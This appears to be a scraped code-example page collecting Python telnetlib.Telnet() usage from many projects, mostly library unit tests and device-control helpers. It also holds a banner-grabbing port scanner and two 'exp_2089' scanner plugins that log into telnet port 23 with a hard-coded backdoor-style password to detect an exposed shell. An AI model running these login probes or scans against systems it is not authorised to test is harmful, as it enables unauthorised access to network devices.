python类Telnet()的实例源码

test_telnetlib.py 文件源码 项目:oil 作者: oilshell 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def test_read_very_lazy_A(self):
        want = ['x' * 100, EOF_sigil]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        self.assertEqual('', telnet.read_very_lazy())
        data = ''
        while True:
            try:
                read_data = telnet.read_very_lazy()
            except EOFError:
                break
            data += read_data
            if not read_data:
                telnet.fill_rawq()
                self.assertEqual('', telnet.cookedq)
                telnet.process_rawq()
            self.assertTrue(want[0].startswith(data))
        self.assertEqual(data, want[0])
test_telnetlib.py 文件源码 项目:oil 作者: oilshell 项目源码 文件源码 阅读 18 收藏 0 点赞 0 评论 0
def _test_command(self, data):
        """ helper for testing IAC + cmd """
        self.setUp()
        self.dataq.put(data)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        nego = nego_collector()
        telnet.set_option_negotiation_callback(nego.do_nego)
        txt = telnet.read_all()
        cmd = nego.seen
        self.assertTrue(len(cmd) > 0) # we expect at least one command
        self.assertIn(cmd[0], self.cmds)
        self.assertEqual(cmd[1], tl.NOOPT)
        self.assertEqual(len(''.join(data[:-1])), len(txt + cmd))
        nego.sb_getter = None # break the nego => telnet cycle
        self.tearDown()
test_telnetlib.py 文件源码 项目:python2-tracer 作者: extremecoders-re 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def _test_read_any_eager_A(self, func_name):
        """
        read_very_eager()
          Read all data available already queued or on the socket,
          without blocking.
        """
        want = [self.block_long, 'x' * 100, 'y' * 100, EOF_sigil]
        expects = want[1] + want[2]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        func = getattr(telnet, func_name)
        data = ''
        while True:
            try:
                data += func()
                self.assertTrue(expects.startswith(data))
            except EOFError:
                break
        self.assertEqual(expects, data)
test_telnetlib.py 文件源码 项目:python2-tracer 作者: extremecoders-re 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def test_read_lazy_A(self):
        want = ['x' * 100, EOF_sigil]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        self.assertEqual('', telnet.read_lazy())
        data = ''
        while True:
            try:
                read_data = telnet.read_lazy()
                data += read_data
                if not read_data:
                    telnet.fill_rawq()
            except EOFError:
                break
            self.assertTrue(want[0].startswith(data))
        self.assertEqual(data, want[0])
test_telnetlib.py 文件源码 项目:python2-tracer 作者: extremecoders-re 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def test_read_very_lazy_A(self):
        want = ['x' * 100, EOF_sigil]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        self.assertEqual('', telnet.read_very_lazy())
        data = ''
        while True:
            try:
                read_data = telnet.read_very_lazy()
            except EOFError:
                break
            data += read_data
            if not read_data:
                telnet.fill_rawq()
                self.assertEqual('', telnet.cookedq)
                telnet.process_rawq()
            self.assertTrue(want[0].startswith(data))
        self.assertEqual(data, want[0])
test_telnetlib.py 文件源码 项目:python2-tracer 作者: extremecoders-re 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def _test_command(self, data):
        """ helper for testing IAC + cmd """
        self.setUp()
        self.dataq.put(data)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        nego = nego_collector()
        telnet.set_option_negotiation_callback(nego.do_nego)
        txt = telnet.read_all()
        cmd = nego.seen
        self.assertTrue(len(cmd) > 0) # we expect at least one command
        self.assertIn(cmd[0], self.cmds)
        self.assertEqual(cmd[1], tl.NOOPT)
        self.assertEqual(len(''.join(data[:-1])), len(txt + cmd))
        nego.sb_getter = None # break the nego => telnet cycle
        self.tearDown()
telnet.py 文件源码 项目:actsys 作者: intel-ctrlsys 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def _establish_connection(cls, remote_access_data):
        """Establish telnet connection"""
        try:
            time.sleep(cls.SLEEP_TIME)
            tnet = telnetlib.Telnet(remote_access_data.address, timeout=cls.TIMEOUT)
        except EnvironmentError:
            # print "Telnet: Error connecting to remote device"
            return None
        if remote_access_data.username != 'None':
            tnet.read_until("login:")
            tnet.write("\r\n" + remote_access_data.username + "\r\n")
        if remote_access_data.identifier != 'None':
            tnet.read_until("Password: ")
            tnet.write("\r\n" + remote_access_data.identifier + "\r\n")
            tnet.read_until(">")
        return tnet
telnet_scpi_client.py 文件源码 项目:mobly 作者: google 项目源码 文件源码 阅读 18 收藏 0 点赞 0 评论 0
def cmd(self, cmd_str, wait_ret=True):
        if not isinstance(cmd_str, str):
            raise TypeError("Invalid command string", cmd_str)
        if not self.is_open:
            raise attenuator.Error("Telnet connection not open for commands")

        cmd_str.strip(self.tx_cmd_separator)
        self._tn.read_until(_ascii_string(self.prompt), 2)
        self._tn.write(_ascii_string(cmd_str + self.tx_cmd_separator))
        if wait_ret is False:
            return None

        match_idx, match_val, ret_text = self._tn.expect(
            [_ascii_string("\S+" + self.rx_cmd_separator)], 1)

        if match_idx == -1:
            raise attenuator.Error(
                "Telnet command failed to return valid data")

        ret_text = ret_text.decode()
        ret_text = ret_text.strip(self.tx_cmd_separator + self.rx_cmd_separator
                                  + self.prompt)

        return ret_text
connection_debug.py 文件源码 项目:fermentrack 作者: thorrak 项目源码 文件源码 阅读 17 收藏 0 点赞 0 评论 0
def test_telnet(hostname):
  # This attempts to test the validity of a controller
  # It returns a tuple (probably not the best way to do this) which is in the format:
  # Initial Connection Test (bool), Version Response Test (bool), Version Response (str)
  try:
    tn = telnetlib.Telnet(host=hostname, timeout=3)
  except socket.timeout:
    return False, False, None
  try:
    tn.write("n\r\n")
    version_string = tn.read_until("}",3)
  except:
    return True, False, None
  return True, True, version_string


# The following was used for testing during development
test_telnetlib.py 文件源码 项目:web_ctp 作者: molebot 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def test_debuglevel_reads(self):
        # test all the various places that self.msg(...) is called
        given_a_expect_b = [
            # Telnet.fill_rawq
            (b'a', ": recv b''\n"),
            # Telnet.process_rawq
            (tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
            (tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
            (tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
            (tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
            (tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
           ]
        for a, b in given_a_expect_b:
            telnet = test_telnet([a])
            telnet.set_debuglevel(1)
            txt = telnet.read_all()
            self.assertIn(b, telnet._messages)
        return
run_tests.py 文件源码 项目:ospf-model-test 作者: gnakibli 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def FetchCiscoLSDB(globals):    
    sys.stderr.write('fetch cisco LSDB')            
    LSADB = {}
    for r in controlport:
        sys.stderr.write('Fetch ' + r + '\n')
        tn = telnetlib.Telnet(LXCIP, controlport[r])
        LoginToRouter(r, tn)
        CLIoutput = ""
        for lsatype in ["router", "network"]:
            #print "XXXXXXXXXXXXfetch" + lsatype 
            tn.write("show ip ospf database %s \n\r" % lsatype )
            CLIoutput += tn.read_until("#")
            tn.read_very_eager()
        print "*******************" + str(r) + "**************"
        print CLIoutput
        print "--------------------------------------------"
        LSADB[r] = ParseCLIoutput(CLIoutput,globals)
        tn.close()
    return LSADB
tulpar.py 文件源码 项目:tulpar 作者: anilbaranyelken 项目源码 文件源码 阅读 18 收藏 0 点赞 0 评论 0
def portScanner(url,dosyaAdi):
    raporIcerik=""
    baslangic=int(raw_input("Start port: "))
    bitis=int(raw_input("Finish port: "))
    for port in range(baslangic, bitis, 1):
        try:
            i=str(port)
            baglanti = telnetlib.Telnet(url, i)
            baglanti.write("\n")
            print "[+]", str(port), " - ", baglanti.read_all().splitlines()[0]
            raporIcerik+="[+]", str(port), " - ", baglanti.read_all().splitlines()[0]+"\n"
            baglanti.close()
        except:
            pass

    rapor = open(dosyaAdi, "a")
    rapor.write(raporIcerik)
    rapor.close()
tulpar.py 文件源码 项目:tulpar 作者: anilbaranyelken 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def method(url,dosyaAdi):
    try:
        telnetBaglanti = telnetlib.Telnet(url, 80)
        telnetBaglanti.write("OPTIONS / HTTP/1.1\n")
        komut = "Host: " + url + "\n\n\n\n"
        telnetBaglanti.write(komut)
        sayfa = telnetBaglanti.read_all()
        deger = str(sayfa).find("Allow")
        deger2 = str(sayfa).find("\n", deger + 1)
        Metodlar = sayfa[deger:deger2]
        print "Methods: ", Metodlar
        raporIcerik="[+]Methods: "+Metodlar+"\n"
        rapor = open(dosyaAdi, "a")
        rapor.write(raporIcerik)
        rapor.close()
    except:
        pass
basic_deployment.py 文件源码 项目:charm-percona-cluster 作者: openstack 项目源码 文件源码 阅读 17 收藏 0 点赞 0 评论 0
def is_port_open(self, unit=None, port='3306', address=None):
        if unit:
            addr = unit.info['public-address']
        elif address:
            addr = address
        else:
            raise Exception('Please provide a unit or address')

        try:
            telnetlib.Telnet(addr, port)
            return True
        except socket.error as e:
            if e.errno == 113:
                self.log.error("could not connect to %s:%s" % (addr, port))
            if e.errno == 111:
                self.log.error("connection refused connecting"
                               " to %s:%s" % (addr,
                                              port))
            return False
netio_kshell.py 文件源码 项目:labgrid 作者: labgrid-project 项目源码 文件源码 阅读 17 收藏 0 点赞 0 评论 0
def get(host, index):
    index = int(index)
    assert 1 <= index <= 4
    tn = telnetlib.Telnet(host, 1234, 1)
    tn.read_until(b"\r\n", 0.5)
    tn.write(b"login admin admin\n")
    tn.read_until(b"250 OK\r\n", 0.5)
    tn.write("port {}\n".format(index).encode())
    read = tn.read_until(b"\r\n", 0.5)
    m = re.match(".*250 (\d).*", read.decode())
    if m is None:
        raise Exception("NetIO: could not match response")
    value = m.group(1)
    tn.write(b"quit\n")
    tn.close()
    return value == "1"
exp?2089.py 文件源码 项目:AnyScan 作者: zhangzhenfeng 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def audit(arg):
    port = 23
    time = 5
    user = 'admin'
    password = '<<< %s(un=\'%s\') = %u'
    finish = '->'
    try:
        t = telnetlib.Telnet(arg,port, timeout=time)
        t.write(user + '\n')
        t.read_until('password: ')
        t.write(password + '\n')
        str1 =  t.read_until(finish)
        t.write("?\n")
        str = t.read_until(finish)
        t.close()
        if ('->' in str) and ('exec' in str):
            security_hole(arg)
            return arg
    except Exception, e:
        pass
exp_2089.py 文件源码 项目:kekescan 作者: xiaoxiaoleo 项目源码 文件源码 阅读 17 收藏 0 点赞 0 评论 0
def audit(arg):
    port = 23
    time = 5
    user = 'admin'
    password = '<<< %s(un=\'%s\') = %u'
    finish = '->'
    try:
        t = telnetlib.Telnet(arg,port, timeout=time)
        t.write(user + '\n')
        t.read_until('password: ')  
        t.write(password + '\n')
        str1 =  t.read_until(finish)
        t.write("?\n")
        str = t.read_until(finish)
        t.close()
        if ('->' in str) and ('exec' in str):
            security_hole(arg)
    except Exception, e:
        pass
test_telnetlib.py 文件源码 项目:pefile.pypy 作者: cloudtracer 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def _test_read_any_eager_A(self, func_name):
        """
        read_very_eager()
          Read all data available already queued or on the socket,
          without blocking.
        """
        want = [self.block_long, 'x' * 100, 'y' * 100, EOF_sigil]
        expects = want[1] + want[2]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        func = getattr(telnet, func_name)
        data = ''
        while True:
            try:
                data += func()
                self.assertTrue(expects.startswith(data))
            except EOFError:
                break
        self.assertEqual(expects, data)
test_telnetlib.py 文件源码 项目:pefile.pypy 作者: cloudtracer 项目源码 文件源码 阅读 18 收藏 0 点赞 0 评论 0
def test_read_lazy_A(self):
        want = ['x' * 100, EOF_sigil]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        self.assertEqual('', telnet.read_lazy())
        data = ''
        while True:
            try:
                read_data = telnet.read_lazy()
                data += read_data
                if not read_data:
                    telnet.fill_rawq()
            except EOFError:
                break
            self.assertTrue(want[0].startswith(data))
        self.assertEqual(data, want[0])


问题


面经


文章

微信
公众号

扫码关注公众号